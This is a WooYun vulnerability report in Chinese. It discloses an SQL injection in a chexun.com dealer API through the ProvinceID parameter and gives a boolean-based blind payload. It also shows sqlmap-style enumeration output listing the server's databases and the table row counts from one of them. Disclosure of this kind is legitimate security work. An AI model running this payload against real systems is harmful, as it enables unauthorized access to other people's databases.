当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151634

漏洞标题:车讯网某站存在sql注射

相关厂商:车讯网

漏洞作者: Hancock

提交时间:2015-11-04 12:37

修复时间:2015-11-09 12:38

公开时间:2015-11-09 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

车讯网某站存在sql注射

详细说明:

ProvinceID参数:

http://dealer.chexun.com/API/GetDealersByBrandIdOrCompanyId.ashx?ProvinceID=3


Payload:

---
Parameter: ProvinceID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProvinceID=3 AND 6524=6524
---


21个库

available databases [21]:
[*] CheBaiKe
[*] DBAiKaZhuaQu
[*] DBCarSite
[*] DBCharacterLibrary
[*] DBComment
[*] DBDealersShop
[*] DBDingYue
[*] DBDoublue11
[*] DBFeedback
[*] DBSMS
[*] DBTuangou
[*] DBUCenter
[*] DBVoting
[*] DBWapNews
[*] distribution
[*] master
[*] model
[*] msdb
[*] ProjectManagement
[*] tempdb
[*] ZhaoCheGameDB

漏洞证明:

Database: DBDealersShop
+-------------------------------------------+---------+
| Table                                     | Entries |
+-------------------------------------------+---------+
| dbo.Shop_Access_Log                       | 3456993 |
| dbo.NewCarPublish_Tab                     | 2615828 |
| dbo.Dealer_HuoYue                         | 2137347 |
| dbo.Dealers_Shop_Notice_Cheap             | 403031  |
| dbo.Dealers_Brand_Series_Tab              | 283743  |
| dbo.Dealers_XunJia_Orders_Tab             | 160857  |
| dbo.Dealers_Shop_Notice_Tab               | 151409  |
| dbo.View_XianSuo                          | 151316  |
| dbo.LoginLog                              | 83951   |
| dbo.Dealers_Tab_ZhuaQu                    | 75521   |
| dbo.Dealers_TJ_Log                        | 66837   |
| dbo.Dealers_Shop_Notice_Pic               | 44107   |
| dbo.Dealers_Shop_Photos_Tab               | 35897   |
| dbo.Dealers_Tab                           | 28020   |
| dbo.ModelPrice_Tab                        | 28013   |
| dbo.Dealer_Record_OP                      | 24149   |
| dbo.DealersMessages_Tab                   | 19588   |
| dbo.Dealers_Saler_Team_Tab                | 19174   |
| dbo.bbbb                                  | 16086   |
| dbo.Dealer_ZiZhangHu                      | 12594   |
| dbo.dealer_new                            | 12136   |
| dbo.CAR_MODEL                             | 11620   |
| dbo.System_Notice_Send_Tab                | 11545   |
| dbo.Dealers_Car_Orders_tab                | 11108   |
| dbo.Buy_ShenQing                          | 8511    |
| dbo.Buy_ShenQing_Log_Model                | 7208    |
| dbo.Buy_Order                             | 7100    |
| dbo.Buy_Order_YanZhengMa                  | 4233    |
| dbo.CAR_years                             | 2916    |
| dbo.COMMON_REGIONAL                       | 2873    |
| dbo.aa                                    | 2846    |
| dbo.DealersPhoneLog_Tab                   | 2189    |
| dbo.Dealer_XunJia_DealerCount_Log         | 1980    |
| dbo.Buy_ShengQing_Log                     | 1943    |
| dbo.Dealer_400_Recored                    | 1544    |
| dbo.CAR_series                            | 1498    |
| dbo.DealersTheme_Tab                      | 1492    |
| dbo.Buy_BaoZhengJin_LiuShui               | 971     |
| dbo.Dealers_Register_Tab                  | 931     |
| dbo.Dealers_XunJia_Orders_Tab_20150320bak | 903     |
| dbo.Dealer_ZiZhangHu_Log                  | 824     |
| dbo.Buy_HuoDong_CheYuan                   | 492     |
| dbo.Dealers_Fast_Reply_Tab                | 370     |
| dbo.City_Tab                              | 364     |
| dbo.Buy_ZiZhi                             | 305     |
| dbo.Dealers_Tab_ZhuaQu_City               | 305     |
| dbo.Dealers_Tab_ZhuaQu_Brand              | 284     |
| dbo.BuChong                               | 280     |
| dbo.PangDa                                | 200     |
| dbo.RiChanDealers                         | 198     |
| dbo.Buy_Dealer_ZhangHu                    | 191     |
| dbo.Dealers_AddCarLog                     | 156     |
| dbo.CAR_company                           | 146     |
| dbo.Dealers_Contract                      | 146     |
| dbo.Order_Return                          | 142     |
| dbo.SaleTemp                              | 124     |
| dbo.CAR_Brand                             | 122     |
| dbo.XianSuo_Record                        | 119     |
| dbo.Buy_BaoZhengJin_Log                   | 115     |
| dbo.Buy_ShenQing_KuCun                    | 109     |
| dbo.Dealer_TelKTJB_Recored                | 93      |
| dbo.Buy_HuoDong_Log                       | 67      |
| dbo.LevelLimits_Tab                       | 59      |
| dbo.Buy_HuoDong                           | 50      |
| dbo.Dealers_Agent                         | 48      |
| dbo.Province_Tab                          | 34      |
| dbo.News_Tab                              | 29      |
| dbo.Dealers_Advice                        | 26      |
| dbo.Buy_MaintainceService                 | 20      |
| dbo.System_Notice_Tab                     | 14      |
| dbo.Buy_DingJin_Item                      | 11      |
| dbo.Mall_Lishi                            | 10      |
| dbo.Dealer_Mall_Respone                   | 9       |
| dbo.Region_Tab                            | 9       |
| dbo.Dealer_Shop_ShenQing                  | 8       |
| dbo.ZhiHuanGouChe                         | 8       |
| dbo.Buy_ZhangHu                           | 1       |
| dbo.Dealers_limits_Tab                    | 1       |
+-------------------------------------------+---------+

修复方案:

:(

版权声明:转载请注明来源 Hancock@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-09 12:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论